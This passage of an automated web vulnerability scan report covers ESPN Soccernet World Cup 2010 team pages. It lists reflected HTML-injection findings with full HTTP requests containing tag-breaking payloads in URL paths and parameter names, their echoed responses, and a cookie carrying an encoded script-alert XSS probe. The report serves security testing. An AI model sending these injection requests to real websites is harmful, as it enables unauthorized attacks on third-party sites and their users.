Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:26:01 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:26:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Sat, 06 Nov 2010 23:31:01 GMT
Content-Length: 82091
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New Zealand Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=2666&_slug_=new-zealand17070"><a>7043290c14&topId=801589&linktext=Coach+delighted+with+unbeaten+run">
...[SNIP]...
|
2.20. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/2666/new-zealand |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fb3e"><a>31ef275d77e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/2666/new-zealand?6fb3e"><a>31ef275d77e=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:22:18 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:22:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN33
Cache-Expires: Sat, 06 Nov 2010 23:27:18 GMT
Content-Length: 82203
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New Zealand Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=2666&6fb3e"><a>31ef275d77e=1&_slug_=new-zealand&6fb3e">
...[SNIP]...
|
2.21. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/4469/ghana |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b56f"><a>36f0e92eb87 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4469/ghana3b56f"><a>36f0e92eb87 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:10:00 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:10:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN01
Cache-Expires: Sat, 06 Nov 2010 23:15:00 GMT
Content-Length: 81725
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ghana Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=4469&_slug_=ghana3b56f"><a>36f0e92eb87&topId=805277&linktext=Ghana+crushed%2C+Uruguay+through">
...[SNIP]...
|
2.22. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/4469/ghana |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea54"><a>47a90bab802 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4469/ghana?aea54"><a>47a90bab802=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:43 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sat, 06 Nov 2010 23:13:42 GMT
Content-Length: 81833
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ghana Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=4469&aea54"><a>47a90bab802=1&_slug_=ghana&aea54">
...[SNIP]...
|
2.23. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/448/england |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139f9"><a>a59e25551c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/448/england139f9"><a>a59e25551c6 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:11 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN21
Cache-Expires: Sat, 06 Nov 2010 23:14:10 GMT
Content-Length: 80274
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>England Football /
...[SNIP]...
<a href="/worldcup2010/team?team=448&_slug_=england139f9"><a>a59e25551c6&topId=805083&linktext=FA+confirms+Capello+will+stay+on">
...[SNIP]...
|
2.24. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/448/england |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6170"><a>7607dfaf4a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/448/england?d6170"><a>7607dfaf4a2=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:48 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN20
Cache-Expires: Sat, 06 Nov 2010 23:12:48 GMT
Content-Length: 80382
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>England Football /
...[SNIP]...
<a href="/worldcup2010/team?team=448&d6170"><a>7607dfaf4a2=1&_slug_=england&d6170">
...[SNIP]...
|
2.25. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/449/netherlands |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a26e"><a>ecad0508930 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/449/netherlands7a26e"><a>ecad0508930 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:24:22 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:24:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN21
Cache-Expires: Sat, 06 Nov 2010 23:29:22 GMT
Content-Length: 81781
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Netherlands Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=449&_slug_=netherlands7a26e"><a>ecad0508930&topId=808125&linktext=Andres+Iniesta+fires+Spain+to+glory">
...[SNIP]...
|
2.26. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/449/netherlands |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload accaf"><a>fe1ec450d74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/449/netherlands?accaf"><a>fe1ec450d74=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; 